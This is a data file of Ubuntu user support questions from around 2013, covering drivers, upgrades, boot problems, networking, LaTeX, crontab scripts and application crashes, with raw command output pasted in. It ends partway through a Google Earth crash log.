296584	the most optimal operating system to host virtual machines	i have a laptop toshiba satellite a505 with following features : intel core i3 processor 8kb l1 cache , 64 kb l2 cache , 256kb l3 cache 4 gb ram 500 gb hdd i have used many operating systems on it . ex : win7/8 , ubuntu10.10/11.10/12.10 , linux 5.1 open-suse and etc . i am working in such an environment where i must use many different operating systems . ex : i need work on my ubuntu machine for robotics applications and at the same time need to win8 for some other research projects . of course i use virtual machines and sometime even dual boot os . right now i am trying to build a hierarchy for my system such will be static for me . my purpose is to install one operating system to entire hdd as a host and others as guest operating systems . so i 'd like to choose the best operating system that can manage my laptop 's hardware resources optimally . then i`ll install other guest operating system . reason why i 'm doing so is right now i use win8 and ubuntu 12.10 as dual boot , so if i need to do something in another system i have to reboot it . so i decided to install one host and others as guest operating system . thank you : )
296585	ca n't get online accounts to work from behind proxy	at work i am behind a proxy and i ca n't access my online accounts . i have setup my proxy globally but still no luck connecting to any accounts .
296586	ubuntu 12.04 lts only runs with amd radeon hd6490 and not intel hd 3000	i 'm a bit new to ubuntu 12.04 . i have used it for a few months now , but i do n't exactly know the commands for ubuntu . also i have been searching for a solution to my problem with my hp probook 4730s ( with hybrid graphics ) . but there is no case or thread opened with my current problem . all people want to use both of the gpu 's , but i do n't care about the fatass amd card . i am not planning on gaming on my ubuntu , it 's pure for my education and learning some knowledge about other oses than windows . the only thing i want : i want to use the intel hd graphics gpu so that my laptop has a little more time on a single charge . now , i 'm using the amd card , because there 's no driver for the intel . i 'm getting maybe an hour out of my machine if it runs on ubuntu and gets incredibly hot on the palmrest , keyboard , underside of the laptop and i ca n't hold my hand in front of the fangrill . can somebody explain me how i could easily install the intel gpu on my ubuntu 12.04 lts ? please no talk about all those codes , i really do n't get much of it . i 'm ready to give you all the anwsers to help me get my solution . small system specs for now , because i have a empty accu and forgot my charger : p hp probook 4730s intel core i5 2450m with intel hd graphics 3000 8gb 1333 ddr3 ram ( 2x4gb ) amd radeon hd6490 1gb 17,3 inch led panel 1x intel 330 series ssd 180gb sata 6gb/s 1x crucial c300 series ssd 256gb sata 6gb/s no optical drive by the way : if i use a hardware program ( forgot the name and ca n't look right now ) , i can see that my amd gpu is connected to the intel host controller . if i look closer , there is a address assigned to it . both the intel and the amd gpu have a address ( ofcourse ) . the amd card is number 1 on the host controller and my intel gpu is the second on the host controller . could that have to do something to do with it ? i 'll check this thread every day , even every hour if i must . if you see lacky english , i 'm sorry , but i 'm dutch : p for the hp probook specs : hp driver download page hp quickspecs page ( 4330s , 4430s and 4530s combo page with kind regarts
296591	did not found root folder browser after upgrading to latest	today i have upgrade my system with ubuntu 13.04 . but i did not found the root file system . please help me how do i access the files , a lot of files are in /opt folder . thanks biplab
296593	dual booting windows7 ( ulimate 32-bit ) and ubuntu 13.04	i have windows 7 ( ultimate 32-bit ) installed and i have downloaded ubuntu 13.04 .iso file how do i continue do i need to make a partition , then how to ? i do n't know anything.please help me thanks in advance !
296594	change default printing settings	is there any way to change the default printing settings in the dialog box ? for instance , i would like the paper format to be always a4 . now it always appears as us letter by default and i have to change it each time .
296596	omnikey 1021 installation help	i am a lorry driver and i have to download information from my digital tachograph card to my computer and email them to my boss . i have an onikey 1024 smatcard reader and i have downloaded , from launchpad , the pcsc-omnikey_3-3ubuntu1_amd64.deb to my desktop . this is where i get stuck because when i run terminal and enter sudo dpkg -i pcsc-omnikey_3-3ubuntu1_amd64.deb i get the following results : selecting previously unselected package pcsc-omnikey . ( reading database ... 371699 files and directories currently installed . ) unpacking pcsc-omnikey ( from pcsc-omnikey_3-3ubuntu1_amd64.deb ) ... dpkg : dependency problems prevent configuration of pcsc-omnikey : pcsc-omnikey depends on pcscd ; however : package pcscd is not installed . dpkg : error processing pcsc-omnikey ( -- install ) : dependency problems - leaving unconfigured errors were encountered while processing : pcsc-omnikey i have searched for pcscd but aparently it has been removed from the launchpad disk ... where should i go and what would i best do next ?
296597	what is the differences between xfce session and xubuntu session ?	everytime i boot up xubuntu , i get the question , xfce session or xubuntu session , what are the actual differences ?
296598	copy file to external hard disk	my ubuntu ( desktop part ) does not boot completely because of low disk space ; i logged in to terminal using my username and password , try to copy some file from /home/username/desktop to my external hard disk by /media/hd-lbu3 address . i tried this command : sudo cp -b /home/username/desktop/aplc* /media/hd-lbu3 this command does every thing correct but when i go to /media/hd-lbu3 and do ls , terminal just shows what i copied and does not show other files and folders . when i go to windows and open external hard disk , windows does not show what i copied from ubuntu terminal . is it necessary to do write command or some thing like this after cp ? i think sudo cp -b /home/username/desktop/aplc* /media/hd-lbu3 does not copy even when it shows my files in terminal .
296605	unable to start vmware player after upgrade to 13.04	am unable to start vmware player after upgrade to 13.04 . error : before you can run vmware several modules must be compiled and loaded into the running kernel . if i click on install nothing happens , kindly assist .
296613	problem in configuration of micromax mmx 355g in ubuntu 12.04	hi ! i got an error at the last step . i am using micromax mmx 355g 3g modem hspa 7.2mbps . configuration will be very difficult and detection of driver also difficult . i just did the above steps are fine upto modprobe statement and at last statement : usb_modeswitch -c /etc/usb_modeswitch.d/1dbc:0669 . i got the error is no driver found , but usb storage driver is found and product id is also found : looking for target devices ... found matching product id adding device found devices in target mode or class ( 1 ) looking for default devices ... found matching product id adding device found device in default mode , class or configuration ( 1 ) accessing device 006 on bus 001 ... getting the current device configuration ... ok , got current device configuration ( 1 ) using first interface : 0x00 using endpoints 0x01 ( out ) and 0x87 ( in ) inquiring device details ; driver will be detached ... looking for active driver ... ok , driver found ( `` usb-storage '' ) ok , driver `` usb-storage '' detached could not send inquiry message ( error -2 ) usb description data ( for identification ) -- -- -- -- -- -- -- -- -- -- -- -- - manufacturer : hspa product : hspa serial no . : 8444311594054030 -- -- -- -- -- -- -- -- -- -- -- -- - looking for active driver ... no driver found . either detached before or never attached setting up communication with interface 0 using endpoint 0x01 for message sending ... trying to send message 1 to endpoint 0x01 ... sending the message returned error -2 . trying to continue resetting response endpoint 0x87 resetting message endpoint 0x01 could not reset endpoint ( probably harmless ) : -2 - > run lsusb to note any changes . bye .
296614	how to avoid skype showing chat window when using pidgin ?	i may miss the forest for the trees , but i do n't know how i can force the skype-pidgin-construct to only show pigding-chatwindows when a new message comes in . there is always the pidgin and the skype chat which pop up . can i change that , if yes , what to do ? i 'm using skype 4.1.0.20 and pidgin 2.10.3 on ubuntu 12.04 .
296620	ca n't install brother mfc-6890cdw as network scanner under 12.04	i am trying to get my brother mfc-6890 to work as a scanner under 12.04 , but am already stumped at step 5 in the brother instructions the suggested command line : brsaneconfig3 -a name=scanner model=mfc-6890cdw ip=192.168.1.90 produces error messages varying from : syntax error : unterminated quoted string to can not execute binary file the printer is successfully configured and working as a cups printer . how can i proceed ? p.s . this is too much for a comment , so i am adding a ( lack of ) progress report here : thanks for the tips , but i still get the same errors after reinstalling . during package installation , i get the warning `` package architecture ( amd64 ) does not match system ( i386 ) '' , even though i have an amd x64 system ( with 64 bit ubuntu ) . this seems to be a known problem , and at least one reason why `` -- force-all '' is recommended . thanks to this parameter , the installation reports no errors . however brsaneconfig3 still reports `` syntax error : unterminated quoted string '' when i use the command line with quotes as you recommend above , even if i execute it from the directory ( /usr/local/brother/sane ) where brsaneconfig3 resides . the ls command you recommend presents the same results that you get ( showing the same symlink definition ) , but if i try `` brsaneconfig3 - ? `` , i get `` bash : /usr/bin/brsaneconfig3 : can not execute binary file '' . brsaneconfig3 in /usr/bin is also a symlink to '/usr/local/brother/sane/brsaneconfig3 ' . if i change to /usr/local/brother/sane/ and do 'file brsaneconfig3 ' , i get `` brsaneconfig3 : elf 64-bit lsb executable , x86-64 , version 1 ( sysv ) , dynamically linked ( uses shared libs ) , for gnu/linux 2.6.0 , stripped '' any other ideas ?
296622	13.04 amd64 iso doe n't work	i just downloaded 13.04 amd64.iso and installed on usb with linuxlive . when booting i get message can not find /casper/vmlinux i inserted vmlinux manually into iso . now when nearly booted , i get terminal window which stops at ... ( initramfs ) unable to find a medium containing a live file system needless to say , i am not very impressed with ubuntu . how do i get a version 13.0 amd64.iso that works ?
296627	eclipse : unresolved inclusion < stdarg.h > and < stdbool.h >	as the title says , i get warnings with those two issues , the code compiles and run , but its driving me crazy all those red and yellow lines under the code . how can i remove them and still get the warnings and errors for `` real '' errors . i 'm running eclipse 4.2.2 , coding in c language . system : ubuntu 13.04 64 bit
296638	texlive ca n't find wrapfig.sty while package is installed	i am currently trying to create a report with latex . i have installed the ubuntu packages texlive and texlive-latex-extra . when i try to compile my document i get the error : ! latex error : file `wrapfig.sty ' not found . when i go to my terminal and use kpsewhich like this it can find the package . meisign @ stefan-tpad : ~ $ kpsewhich wrapfig.sty /usr/share/texlive/texmf-dist/tex/latex/wrapfig/wrapfig.sty i have installed all packages with apt-get install . i am using sublime with latex tools as editor . anyone has an idea why the package is not recognized by the latex compiler ? i have looked into the folder and all other latex packages are also in /usr/share/texlive/texmf-dist/tex/latex/ . i also tried now sudo texhash doesnt change anything unfortunately .
296642	shutdown slow : unknown job s35networking	since i 've upgraded to ubuntu 13.04 from 12.04 lts , i get this error when i shutdown the pc : rather than invoking init scripts through /etc/init.d , use the service ( 8 ) utility service s35 networking stop initctl : unknown job : s35networking since the script yor are attempting to invoke has been convert to an upstart job , you may also use the stop ( 8 ) utility , e.g . stop s35networking any ideas how to fix that ?
296645	can not get the option to start up windows xp	i installed ubuntu 13.04 on a pc with windows xp already installed . i can see my windows files in the file manager but do not get an option to boot into windows xp . i need to use visual studio otherwise this would not be a problem . can anybody help me ?
296648	installation of ubuntu 12.04 lts	have downloaded ubuntu 12.04 , how to install and where to install it from
296653	ubuntu 13.04 cpu frequency scaling 'stuck ' on lowest frequency	i 've just installed ubuntu 13.04 on my macbook air , after toying around for awhile the machine felt really slow , so i checked out the cpu frequency . cpufreq-info , it reports 800mhz on all 4 cores ( which is the lowest setting ) . the governor is set to ondemand . now when i put some load on the system ( running a small script that hashes stuff four times ) the machine grinds to a hold , but cpufreq-info is still reporting 800mhz . i can manually set the frequency to 2ghz , which solves the performance problem , but will cost me my battery . this is the output of cpufreq-info : cpufrequtils 008 : cpufreq-info ( c ) dominik brodowski 2004-2009 report errors and bugs to cpufreq @ vger.kernel.org , please . analyzing cpu 0 : driver : acpi-cpufreq cpus which run at the same hardware frequency : 0 1 2 3 cpus which need to have their frequency coordinated by software : 0 maximum transition latency : 10.0 us . hardware limits : 800 mhz - 2.00 ghz available frequency steps : 2.00 ghz , 2.00 ghz , 1.90 ghz , 1.80 ghz , 1.70 ghz , 1.60 ghz , 1.50 ghz , 1.40 ghz , 1.30 ghz , 1.20 ghz , 1.10 ghz , 1000 mhz , 900 mhz , 800 mhz available cpufreq governors : conservative , ondemand , userspace , powersave , performance current policy : frequency should be within 800 mhz and 2.00 ghz . the governor `` ondemand '' may decide which speed to use within this range . current cpu frequency is 800 mhz ( asserted by call to hardware ) . cpufreq stats : 2.00 ghz:5,75 % , 2.00 ghz:0,47 % , 1.90 ghz:0,00 % , 1.80 ghz:0,01 % , 1.70 ghz:0,01 % , 1.60 ghz:0,01 % , 1.50 ghz:0,01 % , 1.40 ghz:0,01 % , 1.30 ghz:0,01 % , 1.20 ghz:0,02 % , 1.10 ghz:0,01 % , 1000 mhz:0,02 % , 900 mhz:0,02 % , 800 mhz:93,67 % ( 1388 ) analyzing cpu 1 : driver : acpi-cpufreq cpus which run at the same hardware frequency : 0 1 2 3 cpus which need to have their frequency coordinated by software : 1 maximum transition latency : 10.0 us . hardware limits : 800 mhz - 2.00 ghz available frequency steps : 2.00 ghz , 2.00 ghz , 1.90 ghz , 1.80 ghz , 1.70 ghz , 1.60 ghz , 1.50 ghz , 1.40 ghz , 1.30 ghz , 1.20 ghz , 1.10 ghz , 1000 mhz , 900 mhz , 800 mhz available cpufreq governors : conservative , ondemand , userspace , powersave , performance current policy : frequency should be within 800 mhz and 2.00 ghz . the governor `` ondemand '' may decide which speed to use within this range . current cpu frequency is 800 mhz ( asserted by call to hardware ) . cpufreq stats : 2.00 ghz:3,17 % , 2.00 ghz:0,01 % , 1.90 ghz:0,01 % , 1.80 ghz:0,00 % , 1.70 ghz:0,00 % , 1.60 ghz:0,01 % , 1.50 ghz:0,01 % , 1.40 ghz:0,01 % , 1.30 ghz:0,01 % , 1.20 ghz:0,01 % , 1.10 ghz:0,01 % , 1000 mhz:0,02 % , 900 mhz:0,02 % , 800 mhz:96,71 % ( 1433 ) analyzing cpu 2 : driver : acpi-cpufreq cpus which run at the same hardware frequency : 0 1 2 3 cpus which need to have their frequency coordinated by software : 2 maximum transition latency : 10.0 us . hardware limits : 800 mhz - 2.00 ghz available frequency steps : 2.00 ghz , 2.00 ghz , 1.90 ghz , 1.80 ghz , 1.70 ghz , 1.60 ghz , 1.50 ghz , 1.40 ghz , 1.30 ghz , 1.20 ghz , 1.10 ghz , 1000 mhz , 900 mhz , 800 mhz available cpufreq governors : conservative , ondemand , userspace , powersave , performance current policy : frequency should be within 800 mhz and 2.00 ghz . the governor `` ondemand '' may decide which speed to use within this range . current cpu frequency is 800 mhz ( asserted by call to hardware ) . cpufreq stats : 2.00 ghz:2,69 % , 2.00 ghz:0,00 % , 1.90 ghz:0,01 % , 1.80 ghz:0,01 % , 1.70 ghz:0,01 % , 1.60 ghz:0,02 % , 1.50 ghz:0,01 % , 1.40 ghz:0,01 % , 1.30 ghz:0,02 % , 1.20 ghz:0,02 % , 1.10 ghz:0,01 % , 1000 mhz:0,02 % , 900 mhz:0,02 % , 800 mhz:97,16 % ( 1194 ) analyzing cpu 3 : driver : acpi-cpufreq cpus which run at the same hardware frequency : 0 1 2 3 cpus which need to have their frequency coordinated by software : 3 maximum transition latency : 10.0 us . hardware limits : 800 mhz - 2.00 ghz available frequency steps : 2.00 ghz , 2.00 ghz , 1.90 ghz , 1.80 ghz , 1.70 ghz , 1.60 ghz , 1.50 ghz , 1.40 ghz , 1.30 ghz , 1.20 ghz , 1.10 ghz , 1000 mhz , 900 mhz , 800 mhz available cpufreq governors : conservative , ondemand , userspace , powersave , performance current policy : frequency should be within 800 mhz and 2.00 ghz . the governor `` ondemand '' may decide which speed to use within this range . current cpu frequency is 800 mhz ( asserted by call to hardware ) . cpufreq stats : 2.00 ghz:3,07 % , 2.00 ghz:0,02 % , 1.90 ghz:0,01 % , 1.80 ghz:0,00 % , 1.70 ghz:0,01 % , 1.60 ghz:0,01 % , 1.50 ghz:0,01 % , 1.40 ghz:0,01 % , 1.30 ghz:0,01 % , 1.20 ghz:0,01 % , 1.10 ghz:0,03 % , 1000 mhz:0,03 % , 900 mhz:0,01 % , 800 mhz:96,77 % ( 1004 )
296657	upgraded from 12.04 to 13.04 : not sure how to locate my past desktop 's folders	i moved on from 12.04 to 13.04 , desktop version , and in so doing i have inadvertently created another user account , under a different name compared to what i had defined in the 12.04 installation some time ago . i noticed that upon logging in my new 13.04 i could no longer see my past directory structure , as these effectively belong to another user which is not the one i have now . is my past user lost ? most of my stuff was on a dropbox folder , but something was on the desktop . ubuntu one 's backup is also failing me but this is a separate issue . thank you for your patience . massimo
296660	log file trigger execution of script	if there is an bad login to mysql it is logged with the ip in /var/log/mysql/error.log . while that happens , i want a script starts with the log line as input parameter to the script . i was hoping to use rsyslog to solve it but i ca n't find a solution . i have looked at incrontab , but then i have trouble to find all new lines in the error.log . in the end i want to collect all bad ip to a counter on another server for evaluation if it is going to be blocked for the network or not.â¨
296663	how to do install the ubuntu 12.04 lts for android studio ?	i want to install android stuido for ubuntu 12.04 lts but i do n't know how to make path i search google but i do n't know how to make path install linux for android studio i 'm make path do you know how to install the android studio 12.04 lts ?
296666	is there a way to fetch a gtk app 's gsettings values ?	for example , i have devhelp installed . according to the source code , devhelp creates a gsettings id called org.gnome.devhelp.fonts , i would like to know if it 's possible to read the value for org.gnome.devhelp.fonts while devhelp is running . ( notice that in my system , the key org.gnome.devhelp.fonts will not be listed in , for example , the result of gsettings list-recursively . )
296668	winetricks not in dash or menu - ubuntu 13.04	i installed new ubuntu 13.04 and wine 1.5.29 trough ppa . but i noticed that on older ubuntu versions , after installation of wine and winetricks ( they install together now ) , there is a `` winetricks '' icon in the menu ( cairo dock ) and in the dash . on ubuntu 13.04 , after successful installation of both , there is no `` winetricks '' in dash or the menu . it works trough terminal command normally but i want the dash icon ( i 'm a new user , used to `` point and click '' !
296669	why does empathy fail so much ?	i find myself seeing the `` requires authorisation '' error every time i reboot and fire up empathy . most times i have to completely delete the account and add it again in order to connect . is this fixable ?
296670	is it ok to run more than one antivirus program ?	i am running two different anti-virus programs on my ubuntu system . i know in windows this is a bad idea as they will cause issues with each other . i have clam av running , and just managed to get avast working . can i run both applications , or just one ? of the two , which is the better to run . i lean towards avast .
296672	change color of applet context menu font or background	as seen here http : //i.imgur.com/9tysbei.png , theres little contrast between the greys . i 'm using the flatstudio theme with faenza dark icons . i 'm assuming it 's because the icons are for a dark theme , thus using a light font color . can anyone point me in the right direction on how to fix this ?
296674	crontab not running a script	i have set my crontab to run 2 script : $ crontab -l 0 20 * * * /usr/bin/bkp.sh -- silent > /home/perforce/logs/bkp.log 2 > & 1 0 21 * * * /usr/bin/flsbk.sh -- silent > /home/perforce/logs/flsbk.log 2 > & 1 the first script is not running . i set up on crontab -e not sudo crontab -e the error i have is this . from /home/perforce/output.log : ==================================================================================== starting backup ==================================================================================== output location : /home/perforce/output.log running p4 verify ... /usr/bin/bkp.sh : line 22 : p4 : command not found done ! ( no error ) running p4 admin checkpoint ... /usr/bin/bkp.sh : line 46 : p4 : command not found done ! /usr/bin/bkp.sh : line 51 : p4 : command not found ( error ) and my script is this : # ! /bin/bash echo echo `` ==================================================================================== '' echo `` starting backup '' echo `` ==================================================================================== '' # defines output folder and log name output_folder='/home/perforce/' output_file='output.log' output= $ output_folder $ output_file echo `` output location : `` $ output # creates a temp file tmpfile=`mktemp` echo -n `` running p4 verify ... '' # run the p4 and send the output to the temp file p4 verify -q // ... > $ tmpfile echo -n `` done ! '' # check if it 's empty ( no error ) # copy the content to another variable , so we do n't mess up with the original output result=`cat $ tmpfile` if [ `` $ result '' ! = `` '' ] ; then echo `` ( error , saving to log ) '' # save error on output file `echo $ result > $ output` exit fi echo `` ( no error ) '' echo -n `` running p4 admin checkpoint ... '' # run the p4 and send the output to the temp file p4 admin checkpoint > $ tmpfile echo -n `` done ! '' # the file created by the last command counter=`p4 counter journal` file=/perforce_depot/checkpoint. $ counter # check if the file was created if [ -f `` $ file '' ] then echo `` ( no error ) '' else echo `` ( error ) '' exit fi echo -n `` backing up ... '' # finaly , let 's create the backup # `cp -r /perforce_depot '/media/perforce/seagate backup plus drive/perforcebk'` start= $ ( date + % d ) folder_name=`echo $ start | tr -s '/ ' | tr '/ ' '_'` folder_path='/media/perforce/backupdrive/perforcebk' backup_path= $ folder_path/bkp_ $ folder_name mkdir -p $ backup_path cp -r /perforce_depot $ backup_path echo `` done ! '' p4 is located into /usr/local/bin any one have any idea why i am getting that error ? if i ssh to the machine and run manually sh bhp.sh it runs without a problem and any errors .
296676	dell m6700 ethernet ( e1000e ) not working in 13.04	i have 13.04 64-bit on my dell m6700 . wired ethernet worked for a while , but now stopped working . as an extra information , the ethernet works through the docking station ( port replicator ) , but not via the plug on the back of the laptop . i have checked that it works with win7 , so it is not a hw problem . the issue is present with 3.8.0-19 kernel , but it is not present on 3.8.0-16 kernel . the exact problem is that the kernel simply does not see that a cable is plugged in , i.e. , nothing goes into syslog or dmesg . more details : fery @ fery-m6700 : ~ $ lspci |grep eth 00:19.0 ethernet controller : intel corporation 82579lm gigabit network connection ( rev 04 ) the driver is the e1000e module . fery @ fery-m6700 : ~ $ cat /proc/version linux version 3.8.0-19-generic ( buildd @ allspice ) ( gcc version 4.7.3 ( ubuntu/linaro 4.7.3-1ubuntu1 ) ) # 30-ubuntu smp wed may 1 16:35:23 utc 2013 is this the right place to ask this problem ? if not , where should i go ? thanks for help .
296681	latex filepaths in ubuntu	i 'm sorry , this is quite a specific and esoteric question , but i thought if anyone could help ... well , anyway , last night i used ls to look at a directory and noticed some junk hidden files i did n't want . so , unthinkingly , i ran rm ./ . * to clear them . unfortunately , i was still in ~ . well , you can imagine . happily this has had very few adverse effects , as it obviously did n't delete any directories , but it seems to have deleted a latex config file or something . i really have no idea what i 've accidentally gotten rid of , but i had to reinstall texlive , just to be able to run pdflatex and xelatex and whilst they do now work , it 's having trouble finding packages , which are definitely present in /usr/local/texlive/2011/texmf-dist/tex/latex/ if i move the appropriate .sty files from here , then i have no problems . but , as you can imagine , apart from the fact that this is n't a very satisfactory solution , i also make extensive use of the latest versions of the fontspec package , which , sadly , is dependent on a lot of other packages and files that do n't seem to come with apt-get 's verion of texlive . so , my question to you is : do you know of the hidden file which i might have deleted ( and which i need to put back ) that could be causing this ? or , at least , is there a simpler fix than 'rejigging ' the entire file system ?
296685	sendmail not working properly	i wanted my joomla website to send emails , so for that i installed sendmail . i tested it by using putty sendmail emailadress @ domain.com content of email to check if it was working . i made multiple attempts using that command and just one time it delivery the email to my address for my surprise . then i tested with the website . joomla website which is using sendmail service , it 's actually working and sending the emails ; but it us taking a long time to send the email . for example posting on the forum : every time anyone posts on the forum it sends an email notification to the subscribers . it starts the sendmail service , and the website takes about 2 to 3 minutes to publish the post and send out the emails . after that joomla gives an error message could not execute : /usr/sbin/sendmail however the email it 's actually sent . using `` htop '' i can see only 2 minutes after posting , the sendmail service it 's started . the website in question is www.gruenherzjaeger.de thanks for your attention .
296693	plymouth failed . disconnecting from	... plymouth . if plymouth fails , and ubuntu still runs as it should , do i need plymouth ? what is plymouth ? i 'm running ubuntu 13.04
296694	`` please ensure you have java_home points to jdk rather than jre '' message	i have java installed aaa @ ubuntu : ~ $ whereis java java : /usr/bin/java /usr/bin/x11/java /usr/local/java /usr/share/java aaa @ ubuntu : ~ $ whereis javac javac : /usr/bin/javac /usr/bin/x11/javac and etc/profile java_home=/usr/local/java/jdk1.7.0_17 path= $ path : $ home/bin : $ java_home/bin jre_home=/usr/local/java/jre1.7.0_17 path= $ path : $ home/bin : $ jre_home/bin export java_home export jre_home export path however , when i run android studio , it says : tools.jar in not in android studio classpath . please ensure you have java_home points to jdk rather than jre . how do i fix it ? update sudo update-alternatives -- get-selections | grep ^java java manual /usr/local/java/jre1.7.0_17/bin/java javac manual /usr/local/java/jdk1.7.0_17/bin/javac javaws manual /usr/local/java/jre1.7.0_17/bin/javaws java -version java version `` 1.7.0_17 ''
296695	no internet radio for normal user in rhythmbox or banshee ( root ok )	i am a long time user of ubuntu and using banshee and/or rhythmbox for listening to internet radio . since my upgrade to 13.04 , neither banshee nor rhythmbox are able to play internet radio as a normal user . banshee with status `` idle '' , rhythmbox with status `` paused '' . logging in as root , however , there 's no problem . could it be a permission problem for a device ? a socket perhaps ? i ca n't identify a device or socket however , using lsof or looking in /proc/pid/fd .
296698	hide top bar icons on one montior only	i could n't find a question like this , which might be because i do n't have a clue how the top bar icons are named properly . i am using 2 monitors and ubuntu 12.04 with the standard interface ( unity 3d ? ) . i got it to look like i want it to , but the icons on the right of the top bar are shown on both monitors . is it possible to hide the icons ( power icon , etc . ) on one monitor only ?
296701	match directive breaks ssh	on my ubunut server 12.04 lts machine , i try to add a user with only sftp or ftp access . let 's call him 'jim ' for now . jim only needs access to a directory /var/www/example.com . so far i 've tried both vsftpd and openssh , both to no avail . i have openssh installed correctly and i can use sftp for my own account . but i can reach all directories and use ssh which should both not be possible for jim . i 've tried several tutorials including : http : //www.serverubuntu.it/sftp-chroot http : //en.wikibooks.org/wiki/openssh/cookbook/sftp at current stage i have a user account for jim , and he ca n't get ssh access . i changed his home directory to /var/www/example.com . which is from www-data : users , jim is part of the users group and the sftponly group . there are no changes made to sshd_config to limit jim 's options . when i try to add match user jim or match group sftponly and supply any option like chrootdirectory ssh wo n't be able to restart . when i restart the service i do n't get any notice but when taking a look with ps -ae | grep ssh ssh is not listed . if i remove the match directive ssh will properly restart . can anyone give me a hint how to finish my sftp or ftp setup ? i would prefer to have a setup where ftp users would n't be local users but separate managed virtual users .
296702	ubuntu 13.04 boots up with blank screen after update from 12.10	please help if you can . i need my computer for exams this week . i upgraded from 12.10 which ran fine to 13.04 . when it boots now , the screen turns on , displays a clear purple screen , then goes blank . when i enter the disk password and hit enter , i can hear the boot continue , and eventually i get to hear the log on screen sound . however , the screen reamains blank . the output from lspci | grep graphics was 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) i have n't had much luck here getting a response , so please let me know if i am doing anything wrong , or if further information is required . thanks ! i have edited this , as it was marked as a duplicate . however , in the linked file there is no solution given , merely an explanation of the possible cause . this is most similar to the part under 'problems caused by an upgrade ' , section 6 . however , there are no suggestions there for how to fix booting in the updated kernel , or how to roll it back so that it boots in the older version automatically . for this reason , i think it is wrong to mark this as a duplicate . it has not been answered , and i know many people have this problem since upgrading . so rather than pretending it does n't exist , lets keep threads open for a solution eh ? thanks .
296703	ubuntu 13.04 audio and bluetooth issue	update : uninstalled the drivers and now everything is working fine . wifi is connecting without any problem now . the audio and bluetooth problem still remains . sound settings still shows `` dummy output '' when system is turned on . i have to use alsa force-reload inorder for the audio to work . bluetooth settings shows no adapter found lsusb for bluetooth shows bus 001 device 004 : id 0a5c:4500 broadcom corp. bcm2046b1 usb 2.0 hub ( part of bcm2046 bluetooth ) i 'm using ubuntu 13.04 and have been trying to get the system to connect to wireless driver . i 've installed the drivers from software updates - > additional drivers but then , under the driver name , it says `` this device is using an alternate driver '' . i can enable wifi through the indicator in the panel but it does n't detect any network . i 'm using broadcom bcm4313 wireless adapter . there are other problems that i am experiencing , like the `` bluetooth adapter not found '' error , and `` dummy output '' in the audio settings . i have the latest update installed but the issues still remain . the output of lspci is 00:00.0 host bridge : intel corporation core processor dram controller ( rev 12 ) 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 12 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 06 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 06 ) 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 06 ) 00:1c.5 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 6 ( rev 06 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a6 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 06 ) 00:1f.2 ide interface : intel corporation 5 series/3400 series chipset 4 port sata ide controller ( rev 06 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 06 ) 00:1f.5 ide interface : intel corporation 5 series/3400 series chipset 2 port sata ide controller ( rev 06 ) 00:1f.6 signal processing controller : intel corporation 5 series/3400 series chipset thermal subsystem ( rev 06 ) 03:00.0 network controller : broadcom corporation bcm4313 802.11b/g/n wireless lan controller ( rev 01 ) 04:00.0 ethernet controller : qualcomm atheros ar8152 v1.1 fast ethernet ( rev c1 ) ff:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 02 ) ff:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 02 ) ff:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 02 ) ff:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 02 ) ff:02.2 host bridge : intel corporation core processor reserved ( rev 02 ) ff:02.3 host bridge : intel corporation core processor reserved ( rev 02 ) and lsmod | grep -e wl -e b43 gives wl 3074449 0 lib80211 14352 2 wl , lib80211_crypt_tkip cfg80211 510937 1 wl the output of rfkill list is 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no the wireless issue is the most irritating one . it would be really nice if anyone could help me with the audio problem too . i have tried many solutions i found on askubuntu and ubuntuforums , as well as other websites , but nothing worked . thanks .
296718	google earth 7.1 crashing after showing splash screen	running from terminal it shows the following : ~ $ google-earth [ 0517/191140 : error : net_util.cc ( 2195 ) ] not implemented reached in bool net : :haveonlyloopbackaddresses ( ) [ 0517/191145 : error : nss_ocsp.cc ( 581 ) ] no urlrequestcontext for ocsp handler . [ 0517/191146 : error : nss_ocsp.cc ( 581 ) ] no urlrequestcontext for ocsp handler . google earth has caught signal 11. i am using ubuntu 13.04 64bit version . the crash log show this major version 7 minor version 1 build number 0001 build date apr 19 2013 build time 19:38:48 os type 3 os major version 3 os minor version 8 os build version 0 os patch version 0 crash signal 11 crash time 1368796311 up time 19.4486 stacktrace from glibc : ./libgoogleearth_free.so ( +0x23876c ) [ 0x7f7150f7b76c ] ./libgoogleearth_free.so ( +0x2389cd ) [ 0x7f7150f7b9cd ] /lib/x86_64-linux-gnu/libpthread.so.0 ( +0xfbd0 ) [ 0x7f7151c49bd0 ] ./libbase.so ( _zn5earth15gfxcardinfounix25getgraphicscardmemoryinmberi+0xe ) [ 0x7f714b1e86fe ] /opt/google/earth/free/libevll.so ( _zn5earth4evll13visualcontext26detecthardwarecapabilitiesev+0x450 ) [ 0x7f713ed6a490 ] /opt/google/earth/free/libevll.so ( _zn5earth4evll13visualcontext11opencontexten3gap3gfx25igrenderdestinationformaterkns0_8initinfoe+0x1f4 ) [ 0x7f713ed6a8d4 ] /opt/google/earth/free/libevll.so ( _zn5earth4evll13visualcontext4initerkns0_8initinfoe+0x123 ) [ 0x7f713ed6aa33 ] /opt/google/earth/free/libevll.so ( _zn5earth4evll17rendercontextimpl4initerkns0_8initinfoe+0xeb ) [ 0x7f713ec184db ] ./librender.so ( _zn12renderwidget6setapiepn5earth4evll3apie+0x7a ) [ 